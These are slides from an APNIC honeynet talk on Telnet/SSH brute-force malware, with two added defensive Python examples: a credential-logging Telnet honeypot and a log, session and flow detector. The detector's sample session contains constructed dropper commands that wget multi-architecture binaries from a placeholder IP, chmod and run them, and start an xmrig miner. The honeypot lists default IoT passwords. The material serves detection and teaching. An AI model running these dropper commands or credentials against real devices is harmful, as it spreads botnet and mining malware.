Introduction
1. Observations from APNIC
Community Honeynet Project
2. Detection and Remediation
3. Lessons Learned
Let’s Connect!
• Adli Wahid
• @adliwahid
APNIC Community Honeynet Project
• Learning & Information Sharing
– DASH https://dash.apnic.net
– Security Community / CERTs/CSIRTs
– Collaboration with partners
• Highlights
– Telnet / SSH honeypots
– Port 23 / 22 Exposed on the Internet
– Emulate Telnet/SSH services + interaction
So What?
• Honeypots have no production value, so any traffic to them is suspect
– Useful for internal network monitoring / detection
• Malware spreads via Telnet/SSH
– Telnet/SSH enabled by default on many systems and devices
– Exposed on the Internet
• Exploits weak or default credentials
– Since forever :-)
• What happens after a ‘successful login’ provides the bigger picture
[Chart: Activities in the last 24 hours]
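What a Telnet honeypot that emulates the service plus the post-login interaction can look like, as an added example (not APNIC Community Honeynet Project code). The session logic is a pure state machine so it can be exercised offline; the asyncio listener at the bottom wires it to a socket. The listening port, the default-credential list, the banner and the canned command output are hypothetical values chosen for illustration.

```python
"""Minimal Telnet credential-capture honeypot: a pure session state machine
plus a thin asyncio listener. Added example, not APNIC Community Honeynet
Project code; the credential list, banner text, canned output and port are
hypothetical values chosen for illustration."""
import asyncio
import json
import re
import time

LISTEN_PORT = 2323                       # assumption; a real honeypot exposes 23
# Constructed default-credential pairs of the kind IoT botnets try.
DEFAULT_CREDS = {("root", "root"), ("admin", "admin"), ("root", "xc3511"), ("admin", "1234")}
# Canned answers for commands loaders use to fingerprint the box (constructed output).
CANNED = {
    "uname -a": "Linux localhost 3.10.14 #1 SMP PREEMPT armv7l GNU/Linux",
    "cat /proc/cpuinfo": "processor\t: 0\nmodel name\t: ARMv7 Processor rev 5 (v7l)",
    "whoami": "root",
}
PROMPTS = {"user": "login: ", "pass": "Password: ", "shell": "# "}


def fake_response(cmd):
    """Answer like a stripped-down BusyBox box; never execute anything."""
    if cmd in CANNED:
        return CANNED[cmd] + "\n"
    # Mirai-style loaders send "/bin/busybox TOKEN" and look for the
    # "applet not found" reply to confirm they reached a real BusyBox shell.
    if cmd.startswith("/bin/busybox "):
        return cmd.split(None, 1)[1] + ": applet not found\n"
    # cd / rm / chmod / sh etc. silently "succeed"; everything else is unknown.
    first = cmd.split(None, 1)[0] if cmd.strip() else ""
    if first in ("", "cd", "rm", "chmod", "sh", "enable", "system", "shell"):
        return ""
    return f"-sh: {first}: not found\n"


class TelnetSession:
    """Login dialogue + fake shell; every credential and command is recorded."""

    def __init__(self, peer, accept_any=False):
        self.peer, self.accept_any = peer, accept_any
        self.state, self.user, self.events = "user", None, []

    def prompt(self):
        return PROMPTS[self.state]

    def feed(self, line):
        """Consume one line from the attacker; return the reply, or None to close."""
        line = line.rstrip("\r\n")
        if self.state == "user":
            self.user, self.state = line, "pass"
            return self.prompt()
        if self.state == "pass":
            ok = self.accept_any or (self.user, line) in DEFAULT_CREDS
            self.events.append({"t": time.time(), "event": "login", "user": self.user,
                                "password": line, "success": ok})
            if not ok:
                self.state = "user"
                return "Login incorrect\n" + self.prompt()
            self.state = "shell"
            return "BusyBox v1.20.2 built-in shell (ash)\n" + self.prompt()
        self.events.append({"t": time.time(), "event": "command", "input": line})
        if line.strip() in ("exit", "quit"):
            return None
        return fake_response(line) + self.prompt()


IAC = re.compile(rb"\xff[\xfb-\xfe].|\xff[\xf0-\xfa]")  # crude Telnet option-negotiation stripper


async def handle(reader, writer):
    peer = writer.get_extra_info("peername")[0]
    session = TelnetSession(peer)
    writer.write(session.prompt().encode())
    try:
        while True:
            data = await asyncio.wait_for(reader.readline(), timeout=60)
            if not data:
                break
            reply = session.feed(IAC.sub(b"", data).decode("latin-1"))
            if reply is None:
                break
            writer.write(reply.encode())
            await writer.drain()
    except (asyncio.TimeoutError, ConnectionError):
        pass
    finally:
        writer.close()
        for ev in session.events:            # one JSON line per event, ready for a SIEM/MISP pipeline
            print(json.dumps({"src": peer, **ev}))


async def main():
    server = await asyncio.start_server(handle, "0.0.0.0", LISTEN_PORT)
    async with server:
        await server.serve_forever()


if __name__ == "__main__":
    asyncio.run(main())
```

Keeping the dialogue in `TelnetSession` rather than in the socket handler is what makes the honeypot testable and lets the same logic be driven from a pcap replay; the JSON event stream is the raw material for the "what happens after a successful login" view on the slide.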
Highlights
DDoS Agents / Stressers
• Drops a script that downloads ELF binaries
– Builds available for different architectures (x86, x86_64, MIPS, SPARC, etc.)
– Mirai variant
• Perl scripts / bots
• Connects to the mothership (command and control)
• Waits for instructions to launch DDoS attacks
• End goal – part of a DDoS botnet / stresser / booter service, $$
– https://www.imperva.com/learn/ddos/booters-stressers-ddosers/
Coin Miners (Monero/XMR)
• Drops a script that downloads ELF binaries (e.g. xmrig) or further scripts
• Starts mining
• Sends results to a mining pool
• End goal – part of a mining botnet, $$
– https://www.zdnet.com/article/cyber-attackers-are-cashing-in-on-cryptocurrency-mining-but-heres-why-theyre-avoiding-bitcoin/
Detection & Remediation
• Detection is quite straightforward*
– Spreading via Telnet/SSH brute force
– Monitor activities on hosts / outbound connections
– OSINT sources abound for context (VirusTotal, DShield, etc.)
• Remediation
– Types of devices already infected
– Capability to remove malicious code & harden the device
– Patch not available
– Work-arounds*
• Remediation II
– Actors’ infrastructure (DNS, hosts, network) serving malware and providing command and control
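The detection side of the chain in the Highlights and Detection slides (Telnet/SSH brute force, a dropper fetching multi-architecture ELF binaries, then outbound traffic to a mining pool or IRC C2), as an added example that is not APNIC Community Honeynet Project code. It runs three small rule sets over constructed inputs: sshd auth-log lines, a recorded honeypot session, and outbound flow tuples. The failure threshold, the architecture names and the pool/IRC port lists are assumptions, not values from the talk.

```python
"""Detection logic for the chain in the preceding slides: Telnet/SSH brute force,
dropper script fetching multi-architecture ELF binaries, then outbound C2 or
mining-pool traffic. Added example, not APNIC Community Honeynet Project code.
All log lines, session commands and connection records are constructed;
thresholds, architecture names and port lists are assumptions."""
import re
from collections import defaultdict

# --- constructed sample inputs -------------------------------------------------
AUTH_LOG = """\
May  3 10:00:01 gw sshd[911]: Failed password for root from 198.51.100.7 port 51001 ssh2
May  3 10:00:02 gw sshd[912]: Failed password for invalid user admin from 198.51.100.7 port 51002 ssh2
May  3 10:00:03 gw sshd[913]: Failed password for root from 198.51.100.7 port 51003 ssh2
May  3 10:00:04 gw sshd[914]: Failed password for root from 198.51.100.7 port 51004 ssh2
May  3 10:00:05 gw sshd[915]: Failed password for root from 198.51.100.7 port 51005 ssh2
May  3 10:00:06 gw sshd[916]: Accepted password for root from 198.51.100.7 port 51006 ssh2
May  3 10:05:00 gw sshd[917]: Failed password for alice from 203.0.113.9 port 40000 ssh2
"""
# Commands a honeypot might record after a "successful" login (constructed).
SESSION = [
    "enable", "sh", "cd /tmp || cd /var/run",
    "wget http://192.0.2.10/bins/x86 -O .x; chmod +x .x; ./.x",
    "for a in mips mipsel arm7 sparc; do wget http://192.0.2.10/bins/$a -O .b; chmod 777 .b; ./.b; done",
    "./xmrig -o stratum+tcp://192.0.2.20:3333 -u 44wallet -p x",
]
# (src, dst, dst_port) outbound flows from the infected hosts (constructed).
CONNS = [("10.0.0.5", "192.0.2.20", 3333), ("10.0.0.5", "192.0.2.30", 6667),
         ("10.0.0.6", "203.0.113.50", 443)]

# --- rules ----------------------------------------------------------------------
FAIL_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+)")
OK_RE = re.compile(r"sshd\[\d+\]: Accepted \w+ for (\S+) from (\S+)")
IPV4 = r"\b(?:\d{1,3}\.){3}\d{1,3}\b"
DROPPER_RULES = [
    ("download-from-ip", re.compile(r"\b(?:wget|curl|tftp|ftpget)\b.*?" + IPV4)),
    ("chmod-exec", re.compile(r"chmod\s+(?:\+x|[0-7]*7[0-7]*)")),
    ("miner-invocation", re.compile(r"xmrig|stratum\+tcp|minerd|cryptonight", re.I)),
]
ARCH_RE = re.compile(r"\b(x86_64|x86|mips(?:el)?|arm\w*|sparc|ppc|sh4|m68k)\b")
MINING_POOL_PORTS = {3333, 4444, 5555, 7777, 14444}  # common stratum ports (assumption)
IRC_PORTS = {6667, 6697}                               # classic Perl-bot C2 (assumption)


def analyse_auth_log(text, threshold=5):
    """Flag sources with >= threshold failed logins; escalate if one then succeeds."""
    failures = defaultdict(int)
    findings = []
    for line in text.splitlines():
        m = FAIL_RE.search(line)
        if m:
            failures[m.group(2)] += 1
            continue
        m = OK_RE.search(line)
        if m and failures[m.group(2)] >= threshold:
            findings.append(("critical", f"{m.group(1)}@{m.group(2)} logged in after "
                                         f"{failures[m.group(2)]} failures: likely compromised"))
    for src, n in failures.items():
        if n >= threshold:
            findings.append(("high", f"{n} failed logins from {src}: brute force"))
    return findings


def analyse_session(cmds):
    """Tag each recorded command with the dropper/miner behaviours it shows."""
    findings = []
    for cmd in cmds:
        hits = [name for name, rx in DROPPER_RULES if rx.search(cmd)]
        if len(set(ARCH_RE.findall(cmd))) >= 2:      # loader trying several CPU architectures
            hits.append("multi-arch-loop")
        if hits:
            findings.append((cmd, hits))
    return findings


def analyse_connections(conns):
    """Outbound ports that betray mining-pool or IRC C2 traffic."""
    findings = []
    for src, dst, port in conns:
        if port in MINING_POOL_PORTS:
            findings.append(("high", f"{src} -> {dst}:{port} looks like a stratum mining pool"))
        elif port in IRC_PORTS:
            findings.append(("medium", f"{src} -> {dst}:{port} IRC, classic Perl-bot C2"))
    return findings


if __name__ == "__main__":
    for sev, msg in analyse_auth_log(AUTH_LOG) + analyse_connections(CONNS):
        print(f"[{sev}] {msg}")
    for cmd, hits in analyse_session(SESSION):
        print(f"[session] {', '.join(hits)}: {cmd}")
```

The point of the three separate checks is the slide's own one: the brute force is visible in host logs, the dropper is visible in recorded commands, and the C2/pool traffic is visible in outbound flows, so a site that monitors only one of these still has two chances to catch the infection. Port-based pool detection is a heuristic; pair it with VirusTotal/DShield lookups on the download hosts for context.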
Lessons Learned
• Lack of visibility: no monitoring, or not monitoring the things that matter*
– At all levels
– Threat-sharing platforms / OSINT / free feeds (e.g. Shadowserver) can provide context
• Lack of awareness*
– “We deal with APT / big DDoS attacks only”
– Attackers build their infrastructure to carry out the “big attacks”
– “It doesn’t affect us” syndrome
– Security specialization
• Lack of resources
– Responsive mode only
– No remediation & proactive security (including reviewing security policy)
[Chart: One of the recent Linux backdoor/trojan campaigns – spread over time]
Conclusion
• Snap-shot, there’s more!
– Malware spreads via other means
– Different payloads
• Collaboration – with clear goals
– Capability and capacity
• APNIC Community Honeynet Project
– MISP feeds, analysis, etc.
– Let’s chat